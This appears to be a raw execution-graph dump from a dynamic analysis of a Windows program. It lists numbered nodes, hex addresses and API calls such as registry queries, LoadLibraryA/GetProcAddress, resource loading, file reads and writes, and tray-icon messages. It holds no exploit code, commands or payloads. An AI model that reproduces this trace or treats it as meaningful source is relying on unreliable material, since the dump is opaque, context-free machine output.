                                                                                                                        execution_graph 95638 331033 95643 334c91 95638->95643 95642 331042 95651 33a961 95643->95651 95648 334d9c 95649 331038 95648->95649 95659 3351f7 22 API calls __fread_nolock 95648->95659 95650 3500a3 29 API calls __onexit 95649->95650 95650->95642 95660 34fe0b 95651->95660 95653 33a976 95670 34fddb 95653->95670 95655 334cff 95656 333af0 95655->95656 95695 333b1c 95656->95695 95659->95648 95662 34fddb 95660->95662 95663 34fdfa 95662->95663 95666 34fdfc 95662->95666 95680 35ea0c 95662->95680 95687 354ead 7 API calls 2 library calls 95662->95687 95663->95653 95665 35066d 95689 3532a4 RaiseException 95665->95689 95666->95665 95688 3532a4 RaiseException 95666->95688 95669 35068a 95669->95653 95672 34fde0 95670->95672 95671 35ea0c ___std_exception_copy 21 API calls 95671->95672 95672->95671 95673 34fdfa 95672->95673 95676 34fdfc 95672->95676 95692 354ead 7 API calls 2 library calls 95672->95692 95673->95655 95675 35066d 95694 3532a4 RaiseException 95675->95694 95676->95675 95693 3532a4 RaiseException 95676->95693 95679 35068a 95679->95655 95685 363820 pre_c_initialization 95680->95685 95681 36385e 95691 35f2d9 20 API calls __dosmaperr 95681->95691 95683 363849 RtlAllocateHeap 95684 36385c 95683->95684 95683->95685 95684->95662 95685->95681 95685->95683 95690 354ead 7 API calls 2 library calls 95685->95690 95687->95662 95688->95665 95689->95669 95690->95685 95691->95684 95692->95672 95693->95675 95694->95679 95696 333b0f 95695->95696 95697 333b29 95695->95697 95696->95648 95697->95696 95698 333b30 RegOpenKeyExW 95697->95698 95698->95696 95699 333b4a RegQueryValueExW 95698->95699 95700 333b80 RegCloseKey 95699->95700 95701 333b6b 95699->95701 95700->95696 95701->95700 95702 332e37 95703 33a961 22 API calls 95702->95703 95704 332e4d 95703->95704 95781 334ae3 95704->95781 95706 332e6b 95795 333a5a 95706->95795 95708 332e7f 95802 339cb3 95708->95802 95713 372cb0 95850 3a2cf9 95713->95850 95714 332ead 95830 33a8c7 95714->95830 95716 372cc3 95717 372ccf 95716->95717 95876 334f39 95716->95876 95723 334f39 68 API calls 95717->95723 95719 332ec3 95834 336f88 22 API calls 95719->95834 95722 332ecf 95724 339cb3 22 API calls 95722->95724 95725 372ce5 95723->95725 95726 332edc 95724->95726 95882 333084 22 API calls 95725->95882 95835 33a81b 41 API calls 95726->95835 95729 332eec 95731 339cb3 22 API calls 95729->95731 95730 372d02 95883 333084 22 API calls 95730->95883 95733 332f12 95731->95733 95836 33a81b 41 API calls 95733->95836 95734 372d1e 95736 333a5a 24 API calls 95734->95736 95737 372d44 95736->95737 95884 333084 22 API calls 95737->95884 95738 332f21 95740 33a961 22 API calls 95738->95740 95742 332f3f 95740->95742 95741 372d50 95743 33a8c7 22 API calls 95741->95743 95837 333084 22 API calls 95742->95837 95745 372d5e 95743->95745 95885 333084 22 API calls 95745->95885 95746 332f4b 95838 354a28 40 API calls 2 library calls 95746->95838 95748 372d6d 95752 33a8c7 22 API calls 95748->95752 95750 332f59 95750->95725 95751 332f63 95750->95751 95839 354a28 40 API calls 2 library calls 95751->95839 95754 372d83 95752->95754 95886 333084 22 API calls 95754->95886 95755 332f6e 95755->95730 95757 332f78 95755->95757 95840 354a28 40 API calls 2 library calls 95757->95840 95758 372d90 95760 332f83 95760->95734 95761 332f8d 95760->95761 95841 354a28 40 API calls 2 library calls 95761->95841 95763 332f98 95764 332fdc 95763->95764 95842 333084 22 API calls 95763->95842 95764->95748 95765 332fe8 95764->95765 95765->95758 95844 3363eb 22 API calls 95765->95844 95767 332fbf 95769 33a8c7 22 API calls 95767->95769 95771 332fcd 95769->95771 95770 332ff8 95845 336a50 22 API calls 95770->95845 95843 333084 22 API calls 95771->95843 95774 333006 95846 3370b0 23 API calls 95774->95846 95778 333021 95779 333065 95778->95779 95847 336f88 22 API calls 95778->95847 95848 3370b0 23 API calls 95778->95848 95849 333084 22 API calls 95778->95849 95782 334af0 __wsopen_s 95781->95782 95784 334b22 95782->95784 95890 336b57 95782->95890 95794 334b58 95784->95794 95887 334c6d 95784->95887 95786 339cb3 22 API calls 95788 334c52 95786->95788 95787 339cb3 22 API calls 95787->95794 95789 33515f 22 API calls 95788->95789 95792 334c5e 95789->95792 95790 334c6d 22 API calls 95790->95794 95792->95706 95793 334c29 95793->95786 95793->95792 95794->95787 95794->95790 95794->95793 95902 33515f 95794->95902 95919 371f50 95795->95919 95798 339cb3 22 API calls 95799 333a8d 95798->95799 95921 333aa2 95799->95921 95801 333a97 95801->95708 95803 339cc2 _wcslen 95802->95803 95804 34fe0b 22 API calls 95803->95804 95805 339cea __fread_nolock 95804->95805 95806 34fddb 22 API calls 95805->95806 95807 332e8c 95806->95807 95808 334ecb 95807->95808 95941 334e90 LoadLibraryA 95808->95941 95813 334ef6 LoadLibraryExW 95949 334e59 LoadLibraryA 95813->95949 95814 373ccf 95816 334f39 68 API calls 95814->95816 95818 373cd6 95816->95818 95820 334e59 3 API calls 95818->95820 95822 373cde 95820->95822 95821 334f20 95821->95822 95823 334f2c 95821->95823 95971 3350f5 95822->95971 95824 334f39 68 API calls 95823->95824 95827 332ea5 95824->95827 95827->95713 95827->95714 95829 373d05 95831 33a8db 95830->95831 95833 33a8ea __fread_nolock 95830->95833 95832 34fe0b 22 API calls 95831->95832 95831->95833 95832->95833 95833->95719 95834->95722 95835->95729 95836->95738 95837->95746 95838->95750 95839->95755 95840->95760 95841->95763 95842->95767 95843->95764 95844->95770 95845->95774 95846->95778 95847->95778 95848->95778 95849->95778 95851 3a2d15 95850->95851 95852 33511f 64 API calls 95851->95852 95853 3a2d29 95852->95853 96242 3a2e66 95853->96242 95856 3350f5 40 API calls 95857 3a2d56 95856->95857 95858 3350f5 40 API calls 95857->95858 95859 3a2d66 95858->95859 95860 3350f5 40 API calls 95859->95860 95861 3a2d81 95860->95861 95862 3350f5 40 API calls 95861->95862 95863 3a2d9c 95862->95863 95864 33511f 64 API calls 95863->95864 95865 3a2db3 95864->95865 95866 35ea0c ___std_exception_copy 21 API calls 95865->95866 95867 3a2dba 95866->95867 95868 35ea0c ___std_exception_copy 21 API calls 95867->95868 95869 3a2dc4 95868->95869 95870 3350f5 40 API calls 95869->95870 95871 3a2dd8 95870->95871 95872 3a28fe 27 API calls 95871->95872 95874 3a2dee 95872->95874 95873 3a2d3f 95873->95716 95874->95873 96248 3a22ce 95874->96248 95877 334f43 95876->95877 95881 334f4a 95876->95881 95878 35e678 67 API calls 95877->95878 95878->95881 95879 334f6a FreeLibrary 95880 334f59 95879->95880 95880->95717 95881->95879 95881->95880 95882->95730 95883->95734 95884->95741 95885->95748 95886->95758 95908 33aec9 95887->95908 95889 334c78 95889->95784 95891 336b67 _wcslen 95890->95891 95892 374ba1 95890->95892 95895 336ba2 95891->95895 95896 336b7d 95891->95896 95915 3393b2 95892->95915 95894 374baa 95894->95894 95897 34fddb 22 API calls 95895->95897 95914 336f34 22 API calls 95896->95914 95900 336bae 95897->95900 95899 336b85 __fread_nolock 95899->95784 95901 34fe0b 22 API calls 95900->95901 95901->95899 95903 33516e 95902->95903 95907 33518f __fread_nolock 95902->95907 95905 34fe0b 22 API calls 95903->95905 95904 34fddb 22 API calls 95906 3351a2 95904->95906 95905->95907 95906->95794 95907->95904 95909 33aedc 95908->95909 95913 33aed9 __fread_nolock 95908->95913 95910 34fddb 22 API calls 95909->95910 95911 33aee7 95910->95911 95912 34fe0b 22 API calls 95911->95912 95912->95913 95913->95889 95914->95899 95916 3393c0 95915->95916 95918 3393c9 __fread_nolock 95915->95918 95917 33aec9 22 API calls 95916->95917 95916->95918 95917->95918 95918->95894 95920 333a67 GetModuleFileNameW 95919->95920 95920->95798 95922 371f50 __wsopen_s 95921->95922 95923 333aaf GetFullPathNameW 95922->95923 95924 333ae9 95923->95924 95925 333ace 95923->95925 95935 33a6c3 95924->95935 95927 336b57 22 API calls 95925->95927 95928 333ada 95927->95928 95931 3337a0 95928->95931 95932 3337ae 95931->95932 95933 3393b2 22 API calls 95932->95933 95934 3337c2 95933->95934 95934->95801 95936 33a6d0 95935->95936 95937 33a6dd 95935->95937 95936->95928 95938 34fddb 22 API calls 95937->95938 95939 33a6e7 95938->95939 95940 34fe0b 22 API calls 95939->95940 95940->95936 95942 334ec6 95941->95942 95943 334ea8 GetProcAddress 95941->95943 95946 35e5eb 95942->95946 95944 334eb8 95943->95944 95944->95942 95945 334ebf FreeLibrary 95944->95945 95945->95942 95979 35e52a 95946->95979 95948 334eea 95948->95813 95948->95814 95950 334e6e GetProcAddress 95949->95950 95951 334e8d 95949->95951 95952 334e7e 95950->95952 95954 334f80 95951->95954 95952->95951 95953 334e86 FreeLibrary 95952->95953 95953->95951 95955 34fe0b 22 API calls 95954->95955 95956 334f95 95955->95956 96047 335722 95956->96047 95958 334fa1 __fread_nolock 95959 3350a5 95958->95959 95960 373d1d 95958->95960 95965 334fdc 95958->95965 96050 3342a2 CreateStreamOnHGlobal 95959->96050 96061 3a304d 74 API calls 95960->96061 95963 373d22 95966 33511f 64 API calls 95963->95966 95964 3350f5 40 API calls 95964->95965 95965->95963 95965->95964 95970 33506e messages 95965->95970 96056 33511f 95965->96056 95967 373d45 95966->95967 95968 3350f5 40 API calls 95967->95968 95968->95970 95970->95821 95972 335107 95971->95972 95973 373d70 95971->95973 96083 35e8c4 95972->96083 95976 3a28fe 96225 3a274e 95976->96225 95978 3a2919 95978->95829 95982 35e536 CallCatchBlock 95979->95982 95980 35e544 96004 35f2d9 20 API calls __dosmaperr 95980->96004 95982->95980 95984 35e574 95982->95984 95983 35e549 96005 3627ec 26 API calls _strftime 95983->96005 95986 35e586 95984->95986 95987 35e579 95984->95987 95996 368061 95986->95996 96006 35f2d9 20 API calls __dosmaperr 95987->96006 95990 35e58f 95991 35e595 95990->95991 95992 35e5a2 95990->95992 96007 35f2d9 20 API calls __dosmaperr 95991->96007 96008 35e5d4 LeaveCriticalSection __fread_nolock 95992->96008 95994 35e554 __fread_nolock 95994->95948 95997 36806d CallCatchBlock 95996->95997 96009 362f5e EnterCriticalSection 95997->96009 95999 36807b 96010 3680fb 95999->96010 96003 3680ac __fread_nolock 96003->95990 96004->95983 96005->95994 96006->95994 96007->95994 96008->95994 96009->95999 96019 36811e 96010->96019 96011 368177 96028 364c7d 96011->96028 96012 368088 96023 3680b7 96012->96023 96017 368189 96017->96012 96041 363405 11 API calls 2 library calls 96017->96041 96019->96011 96019->96012 96026 35918d EnterCriticalSection 96019->96026 96027 3591a1 LeaveCriticalSection 96019->96027 96020 3681a8 96042 35918d EnterCriticalSection 96020->96042 96046 362fa6 LeaveCriticalSection 96023->96046 96025 3680be 96025->96003 96026->96019 96027->96019 96034 364c8a pre_c_initialization 96028->96034 96029 364cca 96044 35f2d9 20 API calls __dosmaperr 96029->96044 96030 364cb5 RtlAllocateHeap 96031 364cc8 96030->96031 96030->96034 96035 3629c8 96031->96035 96034->96029 96034->96030 96043 354ead 7 API calls 2 library calls 96034->96043 96036 3629d3 RtlFreeHeap 96035->96036 96040 3629fc _free 96035->96040 96037 3629e8 96036->96037 96036->96040 96045 35f2d9 20 API calls __dosmaperr 96037->96045 96039 3629ee GetLastError 96039->96040 96040->96017 96041->96020 96042->96012 96043->96034 96044->96031 96045->96039 96046->96025 96048 34fddb 22 API calls 96047->96048 96049 335734 96048->96049 96049->95958 96051 3342bc FindResourceExW 96050->96051 96055 3342d9 96050->96055 96052 3735ba LoadResource 96051->96052 96051->96055 96053 3735cf SizeofResource 96052->96053 96052->96055 96054 3735e3 LockResource 96053->96054 96053->96055 96054->96055 96055->95965 96057 373d90 96056->96057 96058 33512e 96056->96058 96062 35ece3 96058->96062 96061->95963 96065 35eaaa 96062->96065 96064 33513c 96064->95965 96067 35eab6 CallCatchBlock 96065->96067 96066 35eac2 96078 35f2d9 20 API calls __dosmaperr 96066->96078 96067->96066 96068 35eae8 96067->96068 96080 35918d EnterCriticalSection 96068->96080 96071 35eac7 96079 3627ec 26 API calls _strftime 96071->96079 96072 35eaf4 96081 35ec0a 62 API calls 2 library calls 96072->96081 96075 35eb08 96082 35eb27 LeaveCriticalSection __fread_nolock 96075->96082 96077 35ead2 __fread_nolock 96077->96064 96078->96071 96079->96077 96080->96072 96081->96075 96082->96077 96086 35e8e1 96083->96086 96085 335118 96085->95976 96087 35e8ed CallCatchBlock 96086->96087 96088 35e900 ___scrt_fastfail 96087->96088 96089 35e92d 96087->96089 96090 35e925 __fread_nolock 96087->96090 96113 35f2d9 20 API calls __dosmaperr 96088->96113 96099 35918d EnterCriticalSection 96089->96099 96090->96085 96093 35e937 96100 35e6f8 96093->96100 96094 35e91a 96114 3627ec 26 API calls _strftime 96094->96114 96099->96093 96101 35e727 96100->96101 96104 35e70a ___scrt_fastfail 96100->96104 96115 35e96c LeaveCriticalSection __fread_nolock 96101->96115 96102 35e717 96188 35f2d9 20 API calls __dosmaperr 96102->96188 96104->96101 96104->96102 96106 35e76a __fread_nolock 96104->96106 96106->96101 96107 35e886 ___scrt_fastfail 96106->96107 96116 35d955 96106->96116 96123 368d45 96106->96123 96190 35cf78 26 API calls 4 library calls 96106->96190 96191 35f2d9 20 API calls __dosmaperr 96107->96191 96111 35e71c 96189 3627ec 26 API calls _strftime 96111->96189 96113->96094 96114->96090 96115->96090 96117 35d976 96116->96117 96118 35d961 96116->96118 96117->96106 96192 35f2d9 20 API calls __dosmaperr 96118->96192 96120 35d966 96193 3627ec 26 API calls _strftime 96120->96193 96122 35d971 96122->96106 96124 368d57 96123->96124 96125 368d6f 96123->96125 96203 35f2c6 20 API calls __dosmaperr 96124->96203 96126 3690d9 96125->96126 96138 368db4 96125->96138 96219 35f2c6 20 API calls __dosmaperr 96126->96219 96128 368d5c 96204 35f2d9 20 API calls __dosmaperr 96128->96204 96131 3690de 96220 35f2d9 20 API calls __dosmaperr 96131->96220 96132 368d64 96132->96106 96134 368dbf 96205 35f2c6 20 API calls __dosmaperr 96134->96205 96136 368dcc 96221 3627ec 26 API calls _strftime 96136->96221 96137 368dc4 96206 35f2d9 20 API calls __dosmaperr 96137->96206 96138->96132 96138->96134 96141 368def 96138->96141 96142 368e08 96141->96142 96143 368e2e 96141->96143 96144 368e4a 96141->96144 96142->96143 96150 368e15 96142->96150 96207 35f2c6 20 API calls __dosmaperr 96143->96207 96210 363820 21 API calls 2 library calls 96144->96210 96146 368e33 96208 35f2d9 20 API calls __dosmaperr 96146->96208 96194 36f89b 96150->96194 96151 368e61 96152 3629c8 _free 20 API calls 96151->96152 96155 368e6a 96152->96155 96153 368e3a 96209 3627ec 26 API calls _strftime 96153->96209 96154 368fb3 96157 369029 96154->96157 96160 368fcc GetConsoleMode 96154->96160 96158 3629c8 _free 20 API calls 96155->96158 96159 36902d ReadFile 96157->96159 96161 368e71 96158->96161 96162 369047 96159->96162 96163 3690a1 GetLastError 96159->96163 96160->96157 96164 368fdd 96160->96164 96165 368e96 96161->96165 96166 368e7b 96161->96166 96162->96163 96169 36901e 96162->96169 96167 369005 96163->96167 96168 3690ae 96163->96168 96164->96159 96170 368fe3 ReadConsoleW 96164->96170 96213 369424 28 API calls __fread_nolock 96165->96213 96211 35f2d9 20 API calls __dosmaperr 96166->96211 96186 368e45 __fread_nolock 96167->96186 96214 35f2a3 20 API calls 2 library calls 96167->96214 96217 35f2d9 20 API calls __dosmaperr 96168->96217 96181 369083 96169->96181 96182 36906c 96169->96182 96169->96186 96170->96169 96175 368fff GetLastError 96170->96175 96171 3629c8 _free 20 API calls 96171->96132 96175->96167 96176 368e80 96212 35f2c6 20 API calls __dosmaperr 96176->96212 96177 3690b3 96218 35f2c6 20 API calls __dosmaperr 96177->96218 96183 36909a 96181->96183 96181->96186 96215 368a61 31 API calls 3 library calls 96182->96215 96216 3688a1 29 API calls __fread_nolock 96183->96216 96186->96171 96187 36909f 96187->96186 96188->96111 96189->96101 96190->96106 96191->96111 96192->96120 96193->96122 96195 36f8b5 96194->96195 96196 36f8a8 96194->96196 96199 36f8c1 96195->96199 96223 35f2d9 20 API calls __dosmaperr 96195->96223 96222 35f2d9 20 API calls __dosmaperr 96196->96222 96198 36f8ad 96198->96154 96199->96154 96201 36f8e2 96224 3627ec 26 API calls _strftime 96201->96224 96203->96128 96204->96132 96205->96137 96206->96136 96207->96146 96208->96153 96209->96186 96210->96151 96211->96176 96212->96186 96213->96150 96214->96186 96215->96186 96216->96187 96217->96177 96218->96186 96219->96131 96220->96136 96221->96132 96222->96198 96223->96201 96224->96198 96228 35e4e8 96225->96228 96227 3a275d 96227->95978 96231 35e469 96228->96231 96230 35e505 96230->96227 96232 35e48c 96231->96232 96233 35e478 96231->96233 96237 35e488 __alldvrm 96232->96237 96241 36333f 11 API calls 2 library calls 96232->96241 96239 35f2d9 20 API calls __dosmaperr 96233->96239 96236 35e47d 96240 3627ec 26 API calls _strftime 96236->96240 96237->96230 96239->96236 96240->96237 96241->96237 96246 3a2e7a 96242->96246 96243 3a28fe 27 API calls 96243->96246 96244 3a2d3b 96244->95856 96244->95873 96245 3350f5 40 API calls 96245->96246 96246->96243 96246->96244 96246->96245 96247 33511f 64 API calls 96246->96247 96247->96246 96249 3a22e7 96248->96249 96250 3a22d9 96248->96250 96252 3a232c 96249->96252 96253 35e5eb 29 API calls 96249->96253 96272 3a22f0 96249->96272 96251 35e5eb 29 API calls 96250->96251 96251->96249 96277 3a2557 96252->96277 96254 3a2311 96253->96254 96254->96252 96256 3a231a 96254->96256 96260 35e678 67 API calls 96256->96260 96256->96272 96257 3a2370 96258 3a2374 96257->96258 96259 3a2395 96257->96259 96262 3a2381 96258->96262 96264 35e678 67 API calls 96258->96264 96281 3a2171 96259->96281 96260->96272 96265 35e678 67 API calls 96262->96265 96262->96272 96263 3a239d 96266 3a23c3 96263->96266 96267 3a23a3 96263->96267 96264->96262 96265->96272 96288 3a23f3 96266->96288 96269 3a23b0 96267->96269 96270 35e678 67 API calls 96267->96270 96271 35e678 67 API calls 96269->96271 96269->96272 96270->96269 96271->96272 96272->95873 96273 3a23de 96273->96272 96276 35e678 67 API calls 96273->96276 96274 3a23ca 96274->96273 96296 35e678 96274->96296 96276->96272 96278 3a257c 96277->96278 96280 3a2565 __fread_nolock 96277->96280 96279 35e8c4 __fread_nolock 40 API calls 96278->96279 96279->96280 96280->96257 96282 35ea0c ___std_exception_copy 21 API calls 96281->96282 96283 3a217f 96282->96283 96284 35ea0c ___std_exception_copy 21 API calls 96283->96284 96285 3a2190 96284->96285 96286 35ea0c ___std_exception_copy 21 API calls 96285->96286 96287 3a219c 96286->96287 96287->96263 96289 3a2408 96288->96289 96290 3a24c0 96289->96290 96292 3a24c7 96289->96292 96293 3a21cc 40 API calls 96289->96293 96309 3a2606 96289->96309 96317 3a2269 40 API calls 96289->96317 96313 3a2724 96290->96313 96292->96274 96293->96289 96297 35e684 CallCatchBlock 96296->96297 96298 35e695 96297->96298 96299 35e6aa 96297->96299 96391 35f2d9 20 API calls __dosmaperr 96298->96391 96301 35e6a5 __fread_nolock 96299->96301 96374 35918d EnterCriticalSection 96299->96374 96301->96273 96302 35e69a 96392 3627ec 26 API calls _strftime 96302->96392 96304 35e6c6 96375 35e602 96304->96375 96307 35e6d1 96393 35e6ee LeaveCriticalSection __fread_nolock 96307->96393 96310 3a2617 96309->96310 96311 3a261d 96309->96311 96310->96311 96318 3a26d7 96310->96318 96311->96289 96314 3a2742 96313->96314 96315 3a2731 96313->96315 96314->96292 96316 35dbb3 65 API calls 96315->96316 96316->96314 96317->96289 96319 3a2714 96318->96319 96320 3a2703 96318->96320 96319->96310 96322 35dbb3 96320->96322 96323 35dbc1 96322->96323 96324 35dbdd 96322->96324 96323->96324 96325 35dbe3 96323->96325 96326 35dbcd 96323->96326 96324->96319 96331 35d9cc 96325->96331 96334 35f2d9 20 API calls __dosmaperr 96326->96334 96329 35dbd2 96335 3627ec 26 API calls _strftime 96329->96335 96336 35d97b 96331->96336 96333 35d9f0 96333->96324 96334->96329 96335->96324 96337 35d987 CallCatchBlock 96336->96337 96344 35918d EnterCriticalSection 96337->96344 96339 35d995 96345 35d9f4 96339->96345 96343 35d9b3 __fread_nolock 96343->96333 96344->96339 96353 3649a1 96345->96353 96351 35d9a2 96352 35d9c0 LeaveCriticalSection __fread_nolock 96351->96352 96352->96343 96354 35d955 __fread_nolock 26 API calls 96353->96354 96355 3649b0 96354->96355 96356 36f89b __fread_nolock 26 API calls 96355->96356 96357 3649b6 96356->96357 96358 363820 __fread_nolock 21 API calls 96357->96358 96361 35da09 96357->96361 96359 364a15 96358->96359 96360 3629c8 _free 20 API calls 96359->96360 96360->96361 96362 35da3a 96361->96362 96363 35da24 96362->96363 96366 35da4c 96362->96366 96373 364a56 62 API calls 96363->96373 96364 35da5a 96365 35f2d9 _free 20 API calls 96364->96365 96367 35da5f 96365->96367 96366->96363 96366->96364 96369 35da85 __fread_nolock 96366->96369 96368 3627ec _strftime 26 API calls 96367->96368 96368->96363 96369->96363 96370 35dc0b 62 API calls 96369->96370 96371 35d955 __fread_nolock 26 API calls 96369->96371 96372 3659be __wsopen_s 62 API calls 96369->96372 96370->96369 96371->96369 96372->96369 96373->96351 96374->96304 96376 35e624 96375->96376 96377 35e60f 96375->96377 96389 35e61f 96376->96389 96394 35dc0b 96376->96394 96419 35f2d9 20 API calls __dosmaperr 96377->96419 96379 35e614 96420 3627ec 26 API calls _strftime 96379->96420 96385 35d955 __fread_nolock 26 API calls 96386 35e646 96385->96386 96404 36862f 96386->96404 96389->96307 96390 3629c8 _free 20 API calls 96390->96389 96391->96302 96392->96301 96393->96301 96395 35dc23 96394->96395 96399 35dc1f 96394->96399 96396 35d955 __fread_nolock 26 API calls 96395->96396 96395->96399 96397 35dc43 96396->96397 96421 3659be 96397->96421 96400 364d7a 96399->96400 96401 35e640 96400->96401 96402 364d90 96400->96402 96401->96385 96402->96401 96403 3629c8 _free 20 API calls 96402->96403 96403->96401 96405 36863e 96404->96405 96409 368653 96404->96409 96544 35f2c6 20 API calls __dosmaperr 96405->96544 96407 36868e 96546 35f2c6 20 API calls __dosmaperr 96407->96546 96408 368643 96545 35f2d9 20 API calls __dosmaperr 96408->96545 96409->96407 96412 36867a 96409->96412 96541 368607 96412->96541 96413 368693 96547 35f2d9 20 API calls __dosmaperr 96413->96547 96416 35e64c 96416->96389 96416->96390 96417 36869b 96548 3627ec 26 API calls _strftime 96417->96548 96419->96379 96420->96389 96422 3659ca CallCatchBlock 96421->96422 96423 3659d2 96422->96423 96424 3659ea 96422->96424 96500 35f2c6 20 API calls __dosmaperr 96423->96500 96426 365a88 96424->96426 96430 365a1f 96424->96430 96505 35f2c6 20 API calls __dosmaperr 96426->96505 96427 3659d7 96501 35f2d9 20 API calls __dosmaperr 96427->96501 96446 365147 EnterCriticalSection 96430->96446 96431 365a8d 96506 35f2d9 20 API calls __dosmaperr 96431->96506 96432 3659df __fread_nolock 96432->96399 96435 365a25 96437 365a56 96435->96437 96438 365a41 96435->96438 96436 365a95 96507 3627ec 26 API calls _strftime 96436->96507 96447 365aa9 96437->96447 96502 35f2d9 20 API calls __dosmaperr 96438->96502 96442 365a46 96503 35f2c6 20 API calls __dosmaperr 96442->96503 96444 365a51 96504 365a80 LeaveCriticalSection __wsopen_s 96444->96504 96446->96435 96448 365ad7 96447->96448 96485 365ad0 96447->96485 96449 365afa 96448->96449 96450 365adb 96448->96450 96453 365b4b 96449->96453 96454 365b2e 96449->96454 96515 35f2c6 20 API calls __dosmaperr 96450->96515 96463 365b61 96453->96463 96521 369424 28 API calls __fread_nolock 96453->96521 96518 35f2c6 20 API calls __dosmaperr 96454->96518 96455 365cb1 96455->96444 96456 365ae0 96516 35f2d9 20 API calls __dosmaperr 96456->96516 96460 365ae7 96517 3627ec 26 API calls _strftime 96460->96517 96462 365b33 96519 35f2d9 20 API calls __dosmaperr 96462->96519 96508 36564e 96463->96508 96467 365b6f 96472 365b95 96467->96472 96473 365b73 96467->96473 96468 365ba8 96470 365c02 WriteFile 96468->96470 96471 365bbc 96468->96471 96469 365b3b 96520 3627ec 26 API calls _strftime 96469->96520 96478 365c25 GetLastError 96470->96478 96484 365b8b 96470->96484 96475 365bc4 96471->96475 96476 365bf2 96471->96476 96523 36542e 45 API calls 3 library calls 96472->96523 96477 365c69 96473->96477 96522 3655e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 96473->96522 96480 365be2 96475->96480 96481 365bc9 96475->96481 96526 3656c4 7 API calls 2 library calls 96476->96526 96477->96485 96530 35f2d9 20 API calls __dosmaperr 96477->96530 96478->96484 96525 365891 8 API calls 2 library calls 96480->96525 96481->96477 96486 365bd2 96481->96486 96484->96477 96484->96485 96491 365c45 96484->96491 96532 350a8c 96485->96532 96524 3657a3 7 API calls 2 library calls 96486->96524 96488 365be0 96488->96484 96490 365c8e 96531 35f2c6 20 API calls __dosmaperr 96490->96531 96494 365c60 96491->96494 96495 365c4c 96491->96495 96529 35f2a3 20 API calls 2 library calls 96494->96529 96527 35f2d9 20 API calls __dosmaperr 96495->96527 96498 365c51 96528 35f2c6 20 API calls __dosmaperr 96498->96528 96500->96427 96501->96432 96502->96442 96503->96444 96504->96432 96505->96431 96506->96436 96507->96432 96509 36f89b __fread_nolock 26 API calls 96508->96509 96510 36565e 96509->96510 96511 365663 96510->96511 96539 362d74 38 API calls 3 library calls 96510->96539 96511->96467 96511->96468 96513 365686 96513->96511 96514 3656a4 GetConsoleMode 96513->96514 96514->96511 96515->96456 96516->96460 96517->96485 96518->96462 96519->96469 96520->96485 96521->96463 96522->96484 96523->96484 96524->96488 96525->96488 96526->96488 96527->96498 96528->96485 96529->96485 96530->96490 96531->96485 96533 350a95 96532->96533 96534 350a97 IsProcessorFeaturePresent 96532->96534 96533->96455 96536 350c5d 96534->96536 96540 350c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96536->96540 96538 350d40 96538->96455 96539->96513 96540->96538 96549 368585 96541->96549 96543 36862b 96543->96416 96544->96408 96545->96416 96546->96413 96547->96417 96548->96416 96550 368591 CallCatchBlock 96549->96550 96560 365147 EnterCriticalSection 96550->96560 96552 36859f 96553 3685c6 96552->96553 96554 3685d1 96552->96554 96561 3686ae 96553->96561 96576 35f2d9 20 API calls __dosmaperr 96554->96576 96557 3685cc 96577 3685fb LeaveCriticalSection __wsopen_s 96557->96577 96559 3685ee __fread_nolock 96559->96543 96560->96552 96578 3653c4 96561->96578 96563 3686c4 96591 365333 21 API calls 3 library calls 96563->96591 96565 3686be 96565->96563 96566 3686f6 96565->96566 96568 3653c4 __wsopen_s 26 API calls 96565->96568 96566->96563 96569 3653c4 __wsopen_s 26 API calls 96566->96569 96567 36871c 96571 36873e 96567->96571 96592 35f2a3 20 API calls 2 library calls 96567->96592 96572 3686ed 96568->96572 96570 368702 CloseHandle 96569->96570 96570->96563 96573 36870e GetLastError 96570->96573 96571->96557 96575 3653c4 __wsopen_s 26 API calls 96572->96575 96573->96563 96575->96566 96576->96557 96577->96559 96579 3653e6 96578->96579 96580 3653d1 96578->96580 96585 36540b 96579->96585 96595 35f2c6 20 API calls __dosmaperr 96579->96595 96593 35f2c6 20 API calls __dosmaperr 96580->96593 96583 3653d6 96594 35f2d9 20 API calls __dosmaperr 96583->96594 96585->96565 96586 365416 96596 35f2d9 20 API calls __dosmaperr 96586->96596 96587 3653de 96587->96565 96589 36541e 96597 3627ec 26 API calls _strftime 96589->96597 96591->96567 96592->96571 96593->96583 96594->96587 96595->96586 96596->96589 96597->96587 96598 333156 96601 333170 96598->96601 96602 333187 96601->96602 96603 3331eb 96602->96603 96604 33318c 96602->96604 96642 3331e9 96602->96642 96606 3331f1 96603->96606 96607 372dfb 96603->96607 96608 333265 PostQuitMessage 96604->96608 96609 333199 96604->96609 96605 3331d0 DefWindowProcW 96629 33316a 96605->96629 96612 3331f8 96606->96612 96613 33321d SetTimer RegisterWindowMessageW 96606->96613 96657 3318e2 10 API calls 96607->96657 96608->96629 96610 3331a4 96609->96610 96611 372e7c 96609->96611 96616 3331ae 96610->96616 96617 372e68 96610->96617 96671 39bf30 34 API calls ___scrt_fastfail 96611->96671 96620 333201 KillTimer 96612->96620 96621 372d9c 96612->96621 96618 333246 CreatePopupMenu 96613->96618 96613->96629 96615 372e1c 96658 34e499 42 API calls 96615->96658 96623 3331b9 96616->96623 96634 372e4d 96616->96634 96646 39c161 96617->96646 96618->96629 96653 3330f2 Shell_NotifyIconW ___scrt_fastfail 96620->96653 96625 372dd7 MoveWindow 96621->96625 96626 372da1 96621->96626 96630 3331c4 96623->96630 96631 333253 96623->96631 96624 372e8e 96624->96605 96624->96629 96625->96629 96632 372da7 96626->96632 96633 372dc6 SetFocus 96626->96633 96630->96605 96659 3330f2 Shell_NotifyIconW ___scrt_fastfail 96630->96659 96655 33326f 44 API calls ___scrt_fastfail 96631->96655 96632->96630 96637 372db0 96632->96637 96633->96629 96634->96605 96670 390ad7 22 API calls 96634->96670 96635 333214 96654 333c50 DeleteObject DestroyWindow 96635->96654 96656 3318e2 10 API calls 96637->96656 96640 333263 96640->96629 96642->96605 96644 372e41 96660 333837 96644->96660 96647 39c179 ___scrt_fastfail 96646->96647 96648 39c276 96646->96648 96672 333923 96647->96672 96648->96629 96650 39c25f KillTimer SetTimer 96650->96648 96651 39c1a0 96651->96650 96652 39c251 Shell_NotifyIconW 96651->96652 96652->96650 96653->96635 96654->96629 96655->96640 96656->96629 96657->96615 96658->96630 96659->96644 96661 333862 ___scrt_fastfail 96660->96661 96743 334212 96661->96743 96665 373386 Shell_NotifyIconW 96666 333906 Shell_NotifyIconW 96667 333923 24 API calls 96666->96667 96669 33391c 96667->96669 96668 3338e8 96668->96665 96668->96666 96669->96642 96670->96642 96671->96624 96673 333a13 96672->96673 96674 33393f 